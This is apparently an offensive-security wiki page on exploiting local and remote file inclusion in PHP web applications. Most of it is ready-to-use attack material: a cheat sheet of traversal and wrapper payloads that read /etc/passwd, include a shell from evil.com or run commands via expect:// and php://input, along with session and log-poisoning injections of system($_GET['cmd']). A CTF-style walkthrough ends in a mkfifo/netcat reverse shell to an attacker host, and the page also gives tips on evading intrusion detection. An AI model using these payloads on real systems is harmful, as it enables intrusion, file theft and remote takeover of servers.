Exploiting Local/Remove File Inclusion
- 1 What is LFI / RFI?
- 2 Example: RCE through LFI via SSH Log Poisoning
What is LFI / RFI?
Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.
LFI / RFI Cheat Sheet
http://example.com/index.php?page=../../../etc/passwd http://example.com/index.php?page=../../../etc/passwd%00 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=http://evil.com/shell.txt http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd http://example.com/index.php?page=php:expect://id http://example.com/index.php?page=php:expect://ls http://example.com/index.php?page=path/to/uploaded/file.png http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
Exploit LFI through ZIP
Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension
zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php
Exploit LFI / RCE via input://
http://example.com/index.php?page=php://input DATA: <? system('whoami'); ?>
Exploit LFI / RCE via PHP Session
Check if the website use PHP Session (PHPSESSID)
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly
In PHP5 these sessions are stored into /var/lib/php5/sess_[PHPSESSID]
Inject your command into a cookie:
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
And include it
Exploit LFI / RCE via Log file
Append PHP to a log file (use your imagination here)
http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log
And include it
Exploit RFI wrapping DATA with "" payload
Exploit RFI through EXPECT
Example: RCE through LFI via SSH Log Poisoning
Let's assume your target system is running a flavour of Debian (Ubuntu)) where login attempts are logged to auth.log and said file is accessible via LFI, e.g.
1 # curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.106 |grep logind 2 ... 3 May 9 04:54:33 hostname systemd-login: New seat seat0 4 ...
Good, we can read the log. Now let's try injecting some php into the log. The code will execute remote command and render it's output as part of response.
A word of caution - have to be very careful here as improperly formatted php will break the log in a way that you wont be able to load it any more. If you're planning on injecting large amount of data perhaps create a bunch of temp files under /tmp and work with these instead, keeping auth.log as a fall-back.
The quickest and shortest way to pass arbitrary commands to PHP would be via system() call which can be injected into auth.log as follows:
# ssh '<? system($_GET['cmd']); ?>'@192.168.56.106
Now if you browse same URL again, passing a command like ls, you'll see the output of the command in pas part of the response
# curl -v -s -G --data-urlencode file=/var/log/auth.log cmd='ls -altr' http://192.168.56.106 |less ... -rw-r--r-- 1 www-data root 42K Mar 5 09:33 index.php -rw-r--r-- 1 www-data root 3.1K Mar 5 09:35 about.php -rw-r--r-- 1 www-data root 89 Mar 5 09:36 _super_secret_file.txt ...
Dropping into a system shell
While it might sound very tempting, dropping into a shell is not always a best idea as it will immediately show up in a list of running processes and might be picked up by IDS (Intrusion Detection System) which monitors certain files and processes, or anyone who may be keeping an eye on that host and may trigger Incident Response.
For the sake of CTF, however, this is not a big deal so let's do this!
Term 1: Start nc in listening mode
1 root@kali:~# nc -vvvlt -p 4444 2 listening on [any] 4444 ...
Term 2: Execute remote shell command
1 root@kali:~# curl -G --data-urlencode file=/var/log/auth.log --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106
Term 1: Acknowledge reverse shell connection and spawn new tty so we can interact with it properly
root@kali:~ # nc -vvvlt -p 4444 listening on [any] 4444 ... connect to [192.168.56.200] from robot [192.168.56.108] 49714 /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/bash")' daemon@linux:/var/www $